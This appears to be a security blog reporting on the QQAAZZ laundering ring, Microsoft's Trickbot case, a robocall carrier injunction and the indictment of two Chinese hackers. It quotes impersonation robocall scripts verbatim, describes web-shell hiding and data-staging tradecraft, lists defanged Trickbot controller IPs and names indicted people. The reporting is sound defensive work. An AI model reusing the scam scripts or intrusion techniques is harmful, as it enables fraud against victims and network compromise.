Friday, October 16, 2020

Trickbot on the Ropes Part 2: The QQAAZZ Money Laundering Ring

While shutting down the technical aspects of malware is critical (see Trickbot on the Ropes Part 1), the real disincentive to the criminals is when you hit them hard in the money.  That was the objective of Europol's Operation 2BaGoldMule case against QQAAZZ.   Working with partners in 16 countries, including Latvia, Bulgaria, the United Kingdom, Spain, and Italy, Europol helped to coordinate search warrants being executed at 40 different residences in support of criminal proceedings in the United States, Portugal, and the UK, and Spain.

Europol put out a two-part InfoGraphic as part of their story on the arrests, "20 Arrests in QQAAZZ Multi-Million Money Laundering Case":



The criminals behind the QQAAZZ money laundering ring received funds from botnet operators, and "tumbled" the funds through a variety of shell companies and crypto-currencies to produce "clean money" keeping a 40% to 50% cut of the funds for themselves.

The U.S. Department of Justice says that QQAAZZ-controlled bank accounts received funds stolen via banking trojans including Dridex, Trickbot, and GozNym malware.  The DOJ action came in two rounds, with the first indictment being unsealed back in October 2019 naming these individuals: 

Aleksejs Trofimovics
a/k/a Aleksejs Trofimovich, Alexey Trofimovich, Aleko Stoyanov Angelov 
Ruslans Nikitenko 
a/k/a Krzysztof Wojciech Lewko, Milen Nikolchev Nikolov, Rafal Zimnoch 
Arturs Zaharevics
a/k/a Piotr Ginelli, Arkadiusz Szuberski 
Deniss Ruseckis
a/k/a Denis Rusetsky, Sevdelin Sevdalinov Atanasov 

These individuals used a collection of shell companies to open a large number of bank accounts in Portugal.  In 2018, I sat in a meeting in London with a handful of the largest banks in the UK and heard for the first time as they shared information with one another that it was a "common" thing that when someone had their bank account hit by Trickbot, a wire transfer would be sent to Portugal!

According to the indictment, Ruslans Nikitenko used his shell company Selbevulte LDA to open accounts at eleven banks in Portugal.  He used the company Colossal Devotion LDA to open accounts at nine additional banks.  Arturs Zaharevics created the shell company Cardinal Gradual Real Estate Unipessoal LDA and used it to open accounts at ten banks in Portugal.  Dennis Ruseckis created Flamingocloud LDA and used it to open accounts at thirteen banks in Portugal!

According to the October 2019 Indictment, more than $1.1 Million USD in wire attempts were made just for the transactions shown below, although in more than half of the cases, the funds were able to be blocked or recovered.

DateVictim BankWire AttemptBeneficiary
07MAR2017Schwab  $75000Aktrofi Services
20SEP2017BOA  $84900Aktrofi Services
26OCT2017JPMorgan Chase  $98780Privelegioasis
29NOV2017American Express $121360Selbevulte
30NOV2017BB&T $72000Privelegioasis
08MAR2018USAA $29500Flamingocloud
08MAR2018USAA $29500Colossal Devotion
21MAR2018BOA $49000Colossal Devotion
10APR2018JPMorgan Chase $59426Cardinal Gradual
10APR2018JPMorgan Chase $59426Cardinal Gradual
10APR2018JPMorgan Chase $59426Cardinal Gradual
30AUG2018PNC $99693Selbevulte
14NOV2018BOA $56202Aktrofi Services
14NOV2018BOA $112921Deinis Gorenko
14NOV2018BOA $45830Deinis Gorenko
06DEC2018    JPMorgan Chase $114652Flamingocloud

In between that indictment and the current one, there was a bit more publicity back in May 2020 when "Plinofficial", a Russian scam-rapper, whose real name was Maksim Boiko, was arrested by the FBI when he landed at the Miami airport, as was covered by the BBC and others at the time. 

In the more recent action, the indictment of the US Western District of Pennsylvania was just unsealed, having been filed on 29SEP2020.  This indictment names an additional group of money launderers:

  • Nika Nazarovi - of Georgia - aka Nika Utiashvili, Mihail Atanasov, Stefan Trifonov Zhelyazkov
  • Martins Ignatjevs - of Latvia - aka Yodan Angelov Stoyanov, Aleksander Tihomirov Yanev, Svetlin Iliyanov Asenov 
  • Aleksandre Kobiashvili - of Georgia - aka Antonios Nastas, Ognyan Krasimirov Trifonov
  • Dmitrijs Kuzminovs - of Latvia - aka Parush Gospodinov
  • Valentins Sevecs - of Latvia - aka Marek Jaswilko, Rafal Szczytko
  • Dmitrijs Slapins - of Latvia 
  • Armens Vecels - of Latvia 
  • Artiom Capacli - of Bulgaria
  • Ion Cebanu  - of Romania
  • TOmass Trescinkas - of Latvia 
  • Ruslans Sarapovs - of Latvia 
  • Silvestrs Tamenieks - of Latvia 
  • Abdelhak Hamdaoui  - of Latvia 
  • Petar Iliev - of Belgium 

it says that "in total, cybercriminals attempted to transfer tens of millions of dollars to QQAAZZ-controlled accounts, and QQAAZZ successfully laundered millions of dollars stolen from victims around the world."

The indictment breaks the criminals into three tiers: 

Mid-level Managers 
and Money Mules 

In the September 2020 indictment, some of the victim companies, whose bank accounts were used to wire money to European shell companies created by those named above, included: 

  1. a technology company in Windsor, CT 
  2. an Orthodox Jewish Synagogue in Brooklyn, NY 
  3. a medical device manufacturer in York, Pennsylvania
  4. an individual in Montclair, NJ 
  5. an architecture firm in Miami, FL 
  6. an individual in Acworth, GA
  7. an automative parts manufacturer in Livonia, MI 
  8. a homebuilder in Skokie, IL 
  9. an individual in Carollton, TX 
  10. an individual in Villa Park, CA.  
Dozens of additional US victims are identified, but it is unknown the total number of victims whose funds were stolen, or attempted to be stolen through these schemes. 

Those named in the two indictments received funds to shell company bank accounts including at least 147 accounts opened at banks in Portugal, as well as Germany, Spain, and the United Kingdom. 

The indictment provides a partial list of the funds transfers which occurred between US-based victims and accounts controlled by these criminals. 

In order to accomplish this, members of the QQAAZZ cash-out system advertised their services on "exclusive, underground, Russian-speaking, online cybercriminal forums."   Some of these advertisements on a single forum cost as much as $10,000 per year!  

Some of the online monikers used by QQAAZZ members in these forums included: 

qqaazz            globalqqaazz            markdevido 
richrich          donaldtrump55         manuel           krakadil                     
kalilinux         ritchie                      totala              totala22 

These forum exchanges helped to establish relationships between the malware gangs and the money launderers.  For example, QQAAZZ members using the name "richrich" chatted with members of the GozNym malware crime group about being a "drop handler" in the UK and Europe and having many accounts that could be used for money laundering, including an account in the name "Yaromu Gida" at a bank in Turkey.  That account received $176,500 in funds stolen from the medical device manufactuer in the Western District of Pennsylvania. 

"DonaldTrump55" provided bank account information for a drop belonging to Ruslans Nikitentko at a bank in Portugal opened using a counterfeit Polish identity card in the name Krzysztof Wojciech Lewko.  The account later received $121,360 from a US victim. 

Trickbot On The Ropes: Microsoft's Case Against Trickbot

 Trickbot is having a truly bad time this month!  While as of today, Trickbot binaries are being delivered by Emotet, there is every sign that they are struggling.   Emotet's daily activities are best documented by a team of researchers using the collective identity "Cryptolaemus" and sharing news of IOCs and URLs on their website:  With no activity from October 6th to 12th, there was every indication a "change" was coming, and beginning on 14OCT2020, researchers such as our friends at @CofenseLabs and @Malware_Traffic are both reporting that Trickbot is now being delivered by the Emotet spam-sending botnet.  

This post examines Microsoft's case against Trickbot. However, there are also reports of U.S. Cyber Command taking a role in disrupting Trickbot, as reported by the Washington Post and security journalist Brian Krebs. In the "take-down" attempt, as described by Krebs, the bot began propagating to other bots that its new controller IP address should be "" - which would result in the bot-infected computer stopping communication with the criminals.  There was also an attempt to flood the criminals with millions of fake "stolen credentials" hoping to confuse their ability to sort out "true victims."  As Krebs also reported, the fabulous Trickbot C&C tracker at FEODOTracker is reporting many live C&C addresses for Trickbot.  (Also see Trickbot On the Ropes Part 2: the QQAAZZ Money Laundering Ring.) 

The Microsoft Trickbot Case

On October 12, 2020, Microsoft announced "New action to combat ransomware ahead of U.S. election" describing Trickbot as malware that "has infected over a million computing devices around the world since late 2016." By filing a lawsuit in the U.S. District Court for the Eastern District of Virginia, Microsoft received permission for a Temporary Restraining Order (TRO).  The Digital Crimes Unit (much love, guys!) worked with the FS-ISAC, ESET, Symantec, the Microsoft Defender team, NTT, and Lumen's Black Lotus Lab and others to lay out their case. 

The legal documents surrounding the case are on the Microsoft website:

Microsoft and the FS-ISAC bring the case with a 60 page complaint, demonstrating harm to their respective customers in the Eastern District of Virginia, and demanding that "John Doe 1" and "John Doe 2" appear in court for a Jury Trial.

They charge them with violations of: 

  • The Copyright Act - 17 USC § § 101 
  • The Computer Fraud and Abuse Act 18 USC § 1030
  • The Electronic Communications Privacy Act 18 USC § 2701
  • Trademark Infringement under the Lanham Act 15 USC § 1114
  • False Designation of Origin under the Lanham Act 15 USC § 1125(a)
  • Trademark Dilution under the Lanham Act 15 USC § 1125(c) 
  • Common Law Trespasses to Chattels 
  • Unjust Enrichment 
  • and Conversion 
To do so, Microsoft asked the court to force hosting providers to suspend services and block and monitor traffic for the customers who were using particular IP addresses within their organizations.  The list included: 

  • Input Output Flood, LLC of Las Vegas, for IP addresses: 
    • 104.161.32[.]103, .105, .106, .109, and .118.
  • Hosting Solution Ltd (Hurricane Electric of Fremont, California) for IP address:
    •  104.193.252[.]221.
  • Nodes Direct Holdings of Jacksonville Florida for IP addresses: 
    • 107.155.137[.]7, .19, and .28,
    • 162.216.0[.]163, 
    • 23.239.84[.]132, .136
  • Virtual Machine Solutions, LLC of Los Angeles, California for IP addresses: 
    • 107.174.192[.]162 and 
    • 107.175.184[.]201
  • Hostkey USA of New York for IP address: 
    • 139.60.163[.]45 
  • Fastlink Network Inc, of Los Angelese for IP address: 
    • 156.96.46[.]27
  • Green Floid LLC for IP addresses: 
    • 195.123.241[.]13 and .55 
  • Twinservers Hosting of Nashua, New Hampshire for IP address: 
    • 162.247.155[.]165  

Each team made significant contributions to the effort, and most have published their own Trickbot blogs, which I link below, with regards to the case, their most important function was to provide professional analysis in the form of a Declaration in Support of Motion for TRO: 

  • Lyons is Jason Lyons, a Senior Manager of Investigations at the DCU Malware & Cloud Crimes Team.  Lyons, who served in the Cyber CounterIntelligence unit of the U.S. Army, provides 25 pages of testimony and ten "Exhibits." Part of his testimony included the proof of 25 million Gmail, 19 million Yahoo, 11 million Hotmail, 7 million AOL, 3.5 million MSN, and 2 million addresses known to have been targeted by Trickbot (based on reporting from Deep Instinct)
  • Finones is Rodelio Finones, a Senior Security Software Engineer and Malware Researcher at the Microsoft DCU. He provides a 21 page testimony of his own investigation into Trickbot, 
  • Thakur is Vikram Thakur, the Technical Director of Symantec Enterprise, where he has been a major rockstar for more than a dozen years!  He provides a 20 page testimony.
  • Garlow is Kevin Garlow, Lead Information Security Engineer at LUMEN (formerly CenturyLink). His testimony includes the fact that he has identified 502 distinct IP addresses that had acted as Trickbot controllers, but that 40 of them have remained online despite more than 30 abuse notifications and that 9 of them have been sent more than 100 such notifications.  He states that "We confirmed 55 new Trickbot controller IPs in September 2020 and 99 new Trickbot controller IPs in August."  It is these long-lived "bullet-proof" controllers that Microsoft is targeting.  It is also likely that revealing whoever is paying the bills for those long-lived services may be a path to identifying John Doe 1 and John Doe 2.  Garlow's testimony that he has sent so many notices for take-down which have been ignored is a powerful part of this package!
  • Silberstein is Steven Silberstein, the CEO of the FS-ISAC.  He provides testimony to more than 500 fraud attempts against FS-ISAC member institutions over an 18 month period, with $7 Million in attempted fraud.  One FS-ISAC member had dozens of attempts in a two week period with an average fraud attempt of $268,000!  

  • Ghaffari is Kayvan M. Ghaffari, an attorney with Crowell & Moring LLP for Microsoft and the FS-ISAC.  His testimony calls out the particular web hosting companies that were hosting the machines targeted by the TRO, including Colocrossing, IOFlood, HostKey, VDI-Network, ENET-2, and King Servers, pointing out that all of these organizations have Terms of Service which are clearly violated by the Trickbot controllers.  He then attaches as exhibits more than 650 pages of similar cases and the related court documents from them.
  • Boutin is Jean-Ian Boutin, the Head of Threat Research, calls Trickbot "one of the most prolific and frequently encountered types of malware on the Internet."

Related TrickBot Blogs

ESET analyzed 125,000 malware samples and downloaded and decrypted 40,000 configuration files used by Trickbot modules, helping to map out the C&C servers by the botnet. While Trickbot can drop many "modules" these are not one-size-fits-all.  Trickbot modules were sometimes dropped in phases after an initial assessment of the network on which the bot found itself, and other times varies by the "gtag" -- the unique label used to sign the infection, thought to be related to affiliates who paid the Trickbot operators.

gtag timeline by ESET

Lumen's Black Lotus provided C2 timelines, demonstrating which IP addresses in which countries were active in which timeframes.  Indonesia, for example, hosted active C2 servers on 1,362 days!  Colombia and Ecuador, which by their count were #2 and #3 had only 652 and 637 C2 days by comparison.  They shared 95 C2 addresses in their recent Look Inside the Trickbot Botnet blog post. Many of these IP addresses are also called out in Lyons testimony as Exhibit 2.


Symantec's blog post "Trickbot: U.S. Court Order Hits Botnet's Infrastructure" has a great infographic about "How Trickbot Works": 

Microsoft on Trickbot's use of Covid-19 Lures

Microsoft is in a unique position to take action against malware, having visibility to so much malware-related traffic from browser telemetry, Microsoft Defender reports, and Office365 scans.  In the past year, they have evaluated 6 Trillion messages and blocked 13 Billion malicious emails that used 1.6 Billion URLs to try to infect the email recipients!

Microsoft's Digital Defense Report 2020 points out that Trickbot began using COVID-19 spam lures on March 3, 2020, and went on to become the most prominent spam botnet using COVID-19 themes.

From MS Digital Defense Report 2020 

We've long argued that if the lure is timely and controversial, people will click on it.  That seems to be the case even today as ProofPoint's @ThreatInsight has pointed out, documenting that a recent malware campaign, first seen October 6, 2020, is using President Trump's diagnosis as a lure to infect people with additional malware, using the subject line "Recent material about the president's situation" and the promise of additional details in a password-protected email attachment.

Tuesday, September 08, 2020

RoboCallers Hit with Permanent Injunction by Courts

The Eastern District of New York has ruled in the case "United States v. Nicholas Palumbo, et al" effectively putting and out of business.  These are the "Voice Over IP" companies that have allowed millions of overseas calls per day to be routed to Americans, often for the purposes of facilitating fraud, often by imitating either the Social Security Administration or the IRS.  The case, originally filed 28JAN2020 ( 1:2020cv00473) announced their final "permanent injunction" ruling on 26AUG2020, as conveyed by the Office of the Inspector General of the Social Security Administration.  

In the 62-page criminal complaint against the two companies, the government explains that the major fraud types facilitated by the Palumbos were: 

a. Social Security Administration ("SSA") Imposters

b. Internal Revenue Service ("IRS") Imposters 

c. United States Citizenship and Immigration Services ("USCIS") Imposters 

d. Tech Support Imposters -- often claiming to be Apple or Microsoft 

e. Loan Approval Scams

Through the use of the Palumbos' companies, the callers were able to spoof their caller ID to seem to originate from a U.S. Federal government agency, local police department, or technical support organization. 

From October 1, 2018 to September 30, 2019, the SSA received more than 465,000 complaint related to these types of calls and documented losses of more than $14 million.  The Federal Trade Commission's Consumer Sentinel Database documented 166,000 such calls with losses of $37 million just in calendar 2019.  When all types of government impersonation calls were included, the FTC Consumer Sentinel reported 255,223 complaints causing $128 Million in fraud losses in 2018 and 389,563 complaints resulting in $152 Million in fraud losses in 2019!

The Social Security Calls

According to the government's complaint one such robocall, sent to millions of American telephone numbers in early 2019 used this text: 

"Hello this call is from Department of Social Security Administration the reason you have received this phone call from our department is to inform you that there is a legal enforcement actions filed on your social security number for fraudulent activities so when you get this message kindly call back at the earliest possible on our number before we begin the legal proceedings that is 619-XXX-XXXX. I repeat 619-XXX-XXXX.  Thank you."

The Technology 

How does the technology work?  The foreign call center uses Voice Over IP (VoIP) to connect via broadband Internet to a U.S. based telecommunications company called a "gateway carrier."  The gateway carrier then routes the call to a "common carrier" such as AT&T or Verizon.  Because of the need to bill for these services, both the gateway carrier and the common carrier keep logs of these calls. Part of the service provided by the Gateway Carrier is to perform "least-cost routing" - basically real-time auctioning the call so that the call is routed to the cheapest bidder. 

These logs provide: 
timestamp => destination consumer # => gateway carrier => caller-id presented (often spoofed) => downstream customer (usually the foreign call center) .   

In just 23 days in May and June of 2019, TollFreeDeals transmitted more than SEVEN HUNDRED TWENTY MILLION calls!  (720,000,000 calls!!!!)  425 million of these calls lasted less than one second.  More than 24 million of these calls were placed to residents of the Eastern District of New York.

182 Million of these TollFreeDeals calls were originated from a single India-based VoIP carrier co-conspirator in the United States.  One thousand different source numbers accounted for 90% of these calls.  79% of these 1,000 numbers were listed as fraudulent robocall numbers by a robocall blocking company (YouMail).  Of these 143 million calls, 20% were Social Security imposter calls, 35% were loan approval scams, and 14% were Microsoft refund calls. Other calls imitated the IRS, the U.S. Treasury, and additional tech support scams.

In May 2017, Nicholas Palumbo was notified by AT&T and others that his company was routing fraud government imposter calls.  Palumbo promised to block two particular telephone numbers, but continued to allow the others.  

In February 2019, AT&T notified Palumbo that calls spoofing the USCIS and attempting to extort money had been traced to his company.  Again, Palumbo blamed his India-based VoIP carrier customer, even though this was the same company for which he had already received many warnings.  

A telecommunications industry trade association, USTelecom, provided an additional 144 notifications of fraudulent call origination to the Palumbos' companies from May 2019 to January 2020, including 83 SSA Imposter fraud call cases, 24 Tech Support imposter fraud cases, 10 IRS imposter fraud cases, and 1 USCIS impersonation fraud calls.  USTelecom's notices estimated that TollFreeDeals was placing "more than 1 million fraudulent calls per day."  Palumbo logged in to the USTelecom portal and repeatedly indicated the calls had been placed by the same India-based customers of TollFreeDeals.

USTelecom also formally notified SIP Retail of similar traffic, including 35 traceback investigations from August 2019 to January 2020, including 19 SSA Impersonation cases, 3 Tech Support impersonation cases, and 1 USCIS Impersonation case.

Elder Fraud Task Force Reports

To put a human face on the crimes, a Postal Inspector working for the Elder Fraud Task Force in the Consumer Protection Branch of the Department of Justice investigated many example calls facilitated via the Palumbos' companies.

Palumbo received at least nineteen large cash deposits into Wells Fargo Bank accounts that he controlled from May 28, 2019 to September 11, 2019, totalling $130,250.  The deposits were made in Minnesota, South Carolina, Florida, Alabama, and New Jersey.  After each cash deposit, Palumbo would move the funds to his Ecommerce National LLC accounts at JP Morgan Chase. These activities are characterized by the Postal Inspector as "Interstate Funnel Account" transactions, a form of laundering money.

Some of the victims interviewed by the Postal Inspector included: 

J.K - an 84 year old veteran of the US Marine Corps from Belle Harbor, NY.  He received a call claiming to be from the U.S. Marshals Service with a wrarant for his arrest.  He then was told by a "SSA Employee" that someone had used his SSN to rent a car in Texas and that the car was used in drug trafficking and money laundering.  The "SSA Employee" then forced J.K to wire all of the money in his bank accounts to him - $9,800. 

C.E. - a 36 year old man who was a brand-new U.S. citizen.  He was told be "George" from SSA that he was being investigated for money laundering.  He was told to drive to a Best Buy in Queens, NY and buy $700 worth of gift cards. 

L.U. - a man in his 40s from Roosevelt, NY lost $2,200 in an SSA Imposter scam 

More on Call Routing

Another Affidavit related to this case was the Declaration of a Special Agent of the Social Security Administration's Office of the Inspector General, who provided the diagram above to explain the complication of Least-Call Routing Tracebacks. 

From 2016 to 2020, was offering VoIP termination services specializing in servicing foreign call center call originators.  Their website specifically stated: 

" is your premier connection for call center and dialer termination.  We are always looking for the best call center routes in the telecom industry.  We specialize in short call duration traffic or call center traffic.  We understand there is a need for it and we want to help you find all the channels you need!" 

They were proud of the number of call minutes they had "terminated" (which means, facilitated the call from VoIP to a Common Carrier call completion.)  As of January 23, 2020, they boasted that they had helped to completed 10,491,500,323 minutes of calls!  That's TEN BILLION MINUTES of mostly fraud calls!'s WayBack machine - Jan 10, 2020

One of the calls documented by the SSA OIG Special Agent stated: 

"We have been forced to suspend your social security number with immediate effect.  Due to this, all your social benefits will be cancelled until further clearance. In case you feel this is due to an error you may connect with legal [unintelligible] Social Security Administration. In order to connect with a Social Security Administration office, press One now.  In case we do not hear from you, your social will be blocked permanently. To connect with an officer now, press One and you will automatically be connected with the concern departments. We did not receive any input. Dear citizen, in order to speak with Social Security personnel regarding your social security, press One and this automated system will connect you with the officials." 

This affiant establishes that those 1,000 top phone numbers identified by YouMail and confirmed as fraud based on complaints in the FTC Consumer Sentinel database came from 29 unique TollFreeDeals customers.

Many Additional Details 

There were many rounds of filings by the Palumbos' lawyers, all soundly rebutted by the Department of Justice and their investigators, often with the help of industry experts.  One in particular addresses the behavior of "Yodel" ... in a single day, January 20, 2020, Yodel sent more than 6.5 million robocalls through the Palumbos' services.  5.2 million of these calls use "Neighbor Spoofing" which is the practice of assigning a caller id to the call which seems to originate from someone in the same area code and with the same prefix.  

Thursday, July 23, 2020

Chinese "COVID-19" Hackers indicted after 11 year hacking spree

On July 7, 2020, a Grand Jury in Seattle was presented with evidence about the eleven year campaign of Computer Network Intrusion being conducted by two former classmates who hacked for personal profit and the benefit of the Chinese Ministry of State Security. Li Xiaoyu 李啸宇 and Dong Jiazhi 董家志.  The pair met when they were studying Computer Application Technologies at the University of Electronic Science and Technology ("UEST") in Chengdu, China.  UEST has as its motto:  求实求真 大气大为  -- "To Seek Facts and Truth, To Be Noble and Ambitious."  This pair certainly "sought facts" and were "ambitious," though not in a way that many would consider "Noble."  The University was admitted into Project 985 in 2001, a project that supported 34 top universities encouraging each to become a global leader in their chosen specialty, and incidentally kicking off a new ambitious era of global cyber espionage to help them gain competitive advantage.

Or maybe it was exactly the plan.  In 2007, likely the year that Dong would have started his college experience at UEST, the School of Software boasted that as part of the 11th Five Year Plan, their textbook, 计算机病毒技术 (Computer Virus Technology), received national acclaim.  The following year, they announced the completion of their Information Technology textbook series of 8 books, adding "Network and System Attack Technology" and "Network and System Defense Technology" to the series.  In the United States, "Network and System Attack Technology" ( 网络与系统攻击技术)  is mostly taught in the military and intelligence communities, not in undergrad computer science courses.  In 2017 the course was taught by Li Hongwei (李洪伟), whose slides are online.  In 2019 the instructors were 李洪伟 and 吴立军.
Network and System Attack Technology - Cao Yue and Yu Shengji 
An example slide from a previous version of the course which bother of our hackers would have taken:  (Lecture 2, "Information Retrieval")

The text explains one of the tools from the "experimental" portion of the class, "MS06040Scanner": 

The working principle of MS06040Scanner is to first obtain the operating system type and open ports through port scanning and operating system scanning. If it is a windows2000 system, TCP 139 or TCP 445 port is opened, and the returned data packet matches the definition in the vulnerability library. It means that the host may have MS06040 vulnerabilities, we can use MS06040 exploit programs to carry out remote overflow attacks on it

The second slide demonstrates the "X-Scan" tool which would be used to find vulnerabilities allowing data exfiltration.

The Attacks 

According to the Department of Justice Indictment, Dong was the one who researched victims and means of exploiting them while Li primarily did the hacking. 


Here's how the indictment describes the "Manner and Means of the Conspiracy" -- 

"The defendants research and identified victims possessing information of interest, including trade secrets, confidential business information, information concerning defense products and programs, and personal identifying information ("PII") of victim employees, customers, and others, using various sources of information including business news websites, consulting firm websites, and a variety of search websites.

The defendants then gained unauthorized access to victims possessing the information sought by the conspiracy.  They stole source code from software companies, information about drugs under development, including chemical designs, from pharmaceutical firms; students' PII from an education company; and weapon designs and testing data from defense contractors.

The defendants usually gained initial access to victim networks using publicly known software vulnerabilities in popular products.  Those vulnerabilities were sometimes newly announced, meaning that many users would not have installed patches to correct the vulnerability. ... They also targeted insecure default configurations in common applications."

The defendants used their initial access to place a "web shell" on the victim network, allowing remote execution of commands on a computer.  The most frequently deployed was the "China Chopper" web shell.  They most frequently did so by hiding the file with the name "p.jsp" in an obscure directory on a public-facing website.  (They also sometimes named their webshell's "tst.jsp", "i.jsp", or "/SQLTrace/i.jsp".) The indictment includes a screenshot of China Chopper which is lifted from the FireEye blog post "Breaking down the China Chopper" ... if you are interested, you should also read the Talos Blog post: "China Chopper still active 9 years later

(FireEye explains China Chopper)

They would then plant software for stealing passwords, identifying computer users with Administrator access, and then studying the network for useful data.  The data was compressed as a .RAR file, but then often renamed as a ".jpg" file and placed in the victim's recycle bin until it could be retrieved.

The Victims 

The indictment makes clear that there were "hundreds" of victims between September of 2009 and early 2020, not only the ones listed in this indictment. To characterize the range of victims, they list types of companies, date ranges, amount of data stolen, and type of data gathered. 

Victim 1: California-based technology and defense firm
Dec 2014-Jan 2015
200GB "Radio, laser, and antennae technology; circuit board and related algorithms designs for advanced antennae; testing mechanisms and results."

Victim 2: Maryland-based technology and manufacturing firm - 64GB 

Victim 3: Hanford Site, Department of Energy, Washington State - information about network and personnel, including lists of authorized users and administrator accounts

Victim 4: Texas: 27GB of space and satellite application data 

Victim 5: Virginia Federal Defense contractor - 140GB of project files, drawings and documents related to Air Force and FBI investigations.  PII on 300+ employees

There were many more victims detailed, including:

 a US Educational Software company with "millions of students and teachers' PII." breached from Nov 2018 to Feb 2019, 

 a California pharmaceutical company - 105GB of data in Feb and March 2019 

 a Massachusetts medical device company - 83 GB of source code just as the victim was engaging in a contract with a Chinese firm to produce some of their components.

Other victims were listed in other places, including a large electronics firm in the Netherlands, a Swedish online gaming company (169GB of files including source code and player usernames and passwords), a Lithuanian gaming company, and other companies in Germany, Belgium, the Netherlands, an Australian defense contractor (320GB of data!), a South Korean shipbuilding company, an Australian solar energy company, a Spanish defense firm, and a UK AI firm focused on cancer research.

The Hackers' MSS Connection

The DOJ indictment mentions the Ministry of State Security 19 times, specifically referring to an unnamed "MSS Officer 1." 

"After stealing data and information from their victims and bringing that data and information back to China, Defendants then sold it for profit, or provided it to the MSS, including MSS Officer 1." 

"Li and Dong did not just hack for themselves. While in some instances they were stealing business and other information for their own profit, in others they were stealing information of obvious interest to the PRC Government's Ministry of STate Security ("MSS"). LI and DONG worked with, were assisted by, and operated with the acquiescence of the MSS, including MSS Officer 1, who was assigned to the Guangdong regional division of the MSS (the Guangdong State Security Department, "GSSD"). 

"When stealing information of interest to the MSS, LI and DONG in most instances obtained that data through computer fraud against corporations and research institutions. For example, from victims including defense contractors in the US and abroad, they stole information regarding: military satellite programs; military wireless networks and communications systems; high powered microwave and laser systems; a counter-chemical weapons system; and ship-to-helicopter integration systems. 

In other instances, the Defendants provide the MSS with personal data, such as the passwords for personal email accounts belonging to individual Chinese dissidents including: 
  • a Hong Kong community organizer
  • the pastor of a Christian church in Xi'an
  • a dissident and former Tiananmen Square protestor
  • emails to and from the office of the Dalai Lama
  • emails belonging to Chinese Christian "house" church pastor in Chengdu (who was later arrested)
  • emails form a US professor and organizer
  • two Canadian residents who advocate for freedom and democracy in Hong Kong
MSS Officer 1 assisted LI and other hackers.  When LI had difficulty compromising the mail server of a Burmese human rights group, MSS Officer 1 provided him with 0day malware for a popular browser which exploited a bug not known to the software vendor or security researchers.

MSS Officer 1 claimed to be a researcher at the "Guangdong Province International Affairs Research Center" but in fact was an intelligence officer working for the GSSD at Number 5, 6th Crossroad, Upper Nonglin Road, Yuexiu Distring, Guangzhou.

Example Tools and Techniques 

In several attacks, the attackers (in 2018) targeted ColdFusion vulnerabilities published in 2018 (CVE-2018-15961) attempting to gain access to CKEditor and the associated FileManager, using a ColdFusion web shell program named "cfm backdoor by ufo."  (This tool was actually used in a cool Canadian Government Training on APT groups, although in their training it was an Iranian hacker group using the tool.) 

In some cases, the hackers were clearly operating for personal profit.  Sometimes sending emails with subjects like "Source Code To Be Leaked!" and demanding a ransom payment to prevent publication of their software.

COVID-19 Targeting

On January 25 and 27, 2020, Li searched for vulnerabilities at a Maryland biotech firm who had publicly announced their role in researching a potential COVID-19 vaccine.

On February 1, 2020, Li searched for vulnerabilities in the network of a California biotech firm that had announced the previous day they were researching antiviral drugs to treat COVID-19. 

On May 12, 2020, Li searched for vulnerabilities in the network of a California diagnostics company publicly known to be developing COVID-19 testing kits. 

On June 13, 2020, Li conducted reconnaisance related to a Virginia defense and cybersecurity contractor, Hong Kong protestors, a UK Messaging app used by HK protestors, a Webmail provider used by HK protestors, a Massachusetts biotech firm, and a California space flight firm.